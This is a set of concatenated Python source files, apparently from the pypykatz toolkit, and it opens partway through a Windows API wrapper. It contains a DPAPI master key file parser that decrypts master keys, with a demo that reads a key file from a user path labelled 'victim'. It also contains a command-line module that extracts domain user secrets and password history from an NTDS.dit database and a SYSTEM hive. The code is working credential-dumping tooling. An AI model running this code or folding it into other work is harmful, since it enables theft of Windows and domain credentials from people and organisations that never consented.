    return lpFilename.value

GetProcessImageFileName = GuessStringType(GetProcessImageFileNameA, GetProcessImageFileNameW)

#==============================================================================
# This calculates the list of exported symbols.
_all = set(vars().keys()).difference(_all)
__all__ = [_x for _x in _all if not _x.startswith('_')]
__all__.sort()
#==============================================================================



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import io
import sys

from pypykatz.dpapi.constants import *
from hashlib import sha1
import hmac


class CredHist:
	"""
	"""
	def __init__(self):
		self.version = None
		self.guid = None
		
	@staticmethod
	def from_bytes(data):
		return CredHist.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = CredHist()
		sk.version = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.guid = buff.read(16)
		return sk
		
	def __str__(self):
		t = '== CredHist ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t

class DomainKey:
	"""
	"""
	def __init__(self):
		self.version = None
		self.secret_length = None
		self.access_check_length = None
		self.guid = None
		self.secret = None
		self.access_check = None
		
	@staticmethod
	def from_bytes(data):
		return DomainKey.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = DomainKey()
		sk.version = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.secret_length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.access_check_length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.guid = buff.read(16)
		sk.secret = buff.read(sk.secret_length)
		sk.access_check = buff.read(sk.access_check_length)
		return sk
		
	def __str__(self):
		t = '== DomainKey ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t

class MasterKey:
	"""
	Represents a key, which can be for a masterkey or backupkey
	"""
	def __init__(self):
		self.version = None
		self.salt = None
		self.iteration_count = None
		self.hash_algorithm = None
		self.crypto_algorithm = None
		self.data = None
		
	@staticmethod
	def from_bytes(data):
		return MasterKey.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = MasterKey()
		sk.version = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.salt = buff.read(16)
		sk.iteration_count = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.hash_algorithm = ALGORITHMS(int.from_bytes(buff.read(4), 'little', signed = False))
		sk.crypto_algorithm = ALGORITHMS(int.from_bytes(buff.read(4), 'little', signed = False))
		sk.data = buff.read()
		return sk
		
	def decrypt(self, key):
		if self.hash_algorithm == ALGORITHMS.CALG_HMAC:
			hash_type = sha1
		else:
			hash_type = ALGORITHMS_DATA[self.hash_algorithm][1]
		
		keylen = ALGORITHMS_DATA[self.crypto_algorithm][0] + ALGORITHMS_DATA[self.crypto_algorithm][3]
		
		temp_key_blob = b""
		i = 1
		while len(temp_key_blob) < keylen:
			U = self.salt + i.to_bytes(4, 'big', signed = False)
			i += 1
			derived = hmac.new(key, U, hash_type).digest()
			for _ in range(self.iteration_count - 1):
				actual = hmac.new(key,derived, hash_type).digest()
				derived = (int.from_bytes(derived, sys.byteorder) ^ int.from_bytes(actual, sys.byteorder)).to_bytes(len(actual), sys.byteorder)
			temp_key_blob += derived

		temp_key = temp_key_blob[:keylen]
		#print('temp_key : %s' % temp_key)
		crypt_key = temp_key[:ALGORITHMS_DATA[self.crypto_algorithm][0]]
		iv = temp_key[ALGORITHMS_DATA[self.crypto_algorithm][0]:][:ALGORITHMS_DATA[self.crypto_algorithm][3]]
		cipher = ALGORITHMS_DATA[self.crypto_algorithm][1](crypt_key, mode = ALGORITHMS_DATA[self.crypto_algorithm][2], IV = iv)
		
		cleartext = cipher.decrypt(self.data)
		key_dec = cleartext[-64:]
		hmac_salt = cleartext[:16]
		hmac_res = cleartext[16:][:ALGORITHMS_DATA[self.hash_algorithm][0]]
		
		hmac_key = hmac.new(key, hmac_salt, hash_type).digest()
		hmac_calc = hmac.new(hmac_key, key_dec, hash_type).digest()
		#print(hmac_calc)
		#print(hmac_res)
		if hmac_calc[:ALGORITHMS_DATA[self.hash_algorithm][0]] == hmac_res:
			return key_dec
		else:
			return None
		
	def __str__(self):
		t = '== MasterKey ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t


class MasterKeyFile:
	"""
	A masterkeyfile is a file that can hold multiple different keys, namely the masterkey, backupkey, credential history key, domainkey. 
	Not necessarily all of them present in a file
	"""
	def __init__(self):
		self.version = None
		self.unk1 = None
		self.unk2 = None
		self.guid = None
		self.unk3 = None
		self.policy = None
		self.flags = None
		self.masterkey_length = None
		self.backupkey_length = None
		self.credhist_length = None
		self.domainkey_length = None
		
		self.masterkey:MasterKey = None
		self.backupkey:MasterKey = None
		self.credhist:CredHist = None
		self.domainkey:DomainKey = None
	
	@staticmethod
	def from_bytes(data):
		return MasterKeyFile.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = MasterKeyFile()
		sk.version = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.unk1 = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.unk2 = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.guid = buff.read(72).decode('utf-16-le')
		sk.unk3 = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.policy = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.flags = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.masterkey_length = int.from_bytes(buff.read(8), 'little', signed = False)
		sk.backupkey_length = int.from_bytes(buff.read(8), 'little', signed = False)
		sk.credhist_length = int.from_bytes(buff.read(8), 'little', signed = False)
		sk.domainkey_length = int.from_bytes(buff.read(8), 'little', signed = False)
		
		if sk.masterkey_length > 0:
			sk.masterkey = MasterKey.from_bytes(buff.read(sk.masterkey_length))
		if sk.backupkey_length > 0:
			sk.backupkey = MasterKey.from_bytes(buff.read(sk.backupkey_length))
		if sk.credhist_length > 0:	
			sk.credhist = CredHist.from_bytes(buff.read(sk.credhist_length))
		if sk.domainkey_length > 0:
			sk.domainkey = DomainKey.from_bytes(buff.read(sk.domainkey_length))
		
		
		return sk
		
	def __str__(self):
		t = '== MasterKeyFile ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t
		

		
if __name__ == '__main__':
	filename = 'C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3448413973-1765323015-1500960949-1105\\4c9764dc-aa99-436c-bb30-ff39b3dd407c'
	with open(filename, 'rb') as f:
		mkf = MasterKeyFile.from_bytes(f.read())
		
	print(str(mkf))	
	
		




#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import asyncio
import platform
from tqdm import tqdm

async def flush_buffer(buffer, outfile_handle = None):
	try:
		if outfile_handle is not None:
			res = ''
			for secret in buffer:
				try:
					res += str(secret)
				except:
					continue
			outfile_handle.write(res)
		else:
			for secret in buffer:
				try:
					print(str(secret))
				except:
					continue
		
		buffer = []
		return True, None
	except Exception as e:
		return None, e

class ParsersCMDHelper:
	def __init__(self):
		self.live_keywords = ['parser']
		self.keywords = ['parser']
		
	def add_args(self, parser, live_parser):
		parser_group = parser.add_parser('parser', help='SMB related commands')
		parser_subparsers = parser_group.add_subparsers()
		parser_subparsers.required = True
		parser_subparsers.dest = 'parser_module'

		ntds_group = parser_subparsers.add_parser('ntds', help='NTDS.dit file parser, extracting secrets')
		ntds_group.add_argument('ntdsfile', help="NTDS.dit file")
		ntds_group.add_argument('systemhive', help="SYSTEM hive file or the Bootkey(in hex). This is needed to decrypt the secrets")
		ntds_group.add_argument('-p', '--progress', action='store_true', help="Show progress bar. Please use this only if you also specified an output file.")
		ntds_group.add_argument('-o', '--outfile', help='Output file. If omitted secrets will be printed to STDOUT')
		ntds_group.add_argument('--strict', action='store_true', help='Strict parsing. Fails on errors')
		ntds_group.add_argument('--no-history', action='store_true', help='Do not parse history')
		
		
	def execute(self, args):
		if args.command in self.keywords:
			asyncio.run(self.run(args))
		
		if len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:
			asyncio.run(self.run_live(args))
			
			
	async def run_live(self, args):
		if platform.system().lower() != 'windows':
			raise Exception('Live commands only work on Windows!')
			
	async def run(self, args):
		if args.parser_module == 'ntds':
			from aesedb.examples.ntdsparse import NTDSParserConsole
			ntdscon = NTDSParserConsole(
				args.systemhive,
				args.ntdsfile,
				ignore_errors=args.strict,
				with_history=not args.no_history
			)

			buffer = []
			buffer_size = 1000
			total = await ntdscon.get_total_rows()
			if args.progress is True:
				pbar     = tqdm(desc='JET table parsing ', total=total, unit='records', miniters= total//200 ,position=0)
				pbar_sec = tqdm(desc='User secrets found', unit = '', miniters=buffer_size//10 ,position=1)

			outfile_handle = None
			if args.outfile is not None:
				outfile_handle = open(args.outfile, 'w', newline = '')

			async for secret, err in ntdscon.get_secrets():
				if err is not None:
					raise err

				if args.progress is True:
					pbar.update()
					
				if secret is None:
					continue
					
				if args.progress is True:
					pbar_sec.update()
					

				buffer.append(secret)
				if len(buffer) > buffer_size:
					_, err = await flush_buffer(buffer, outfile_handle)
					buffer = []
					if err is not None:
						raise err

				
			_, err = await flush_buffer(buffer, outfile_handle)
			buffer = []
			if err is not None:
				raise err


			#parser = NTDSParserConsole(args.systemhive, args.ntdsfile, show_progress = args.progress, outfile = args.outfile)
			#await parser.run()

		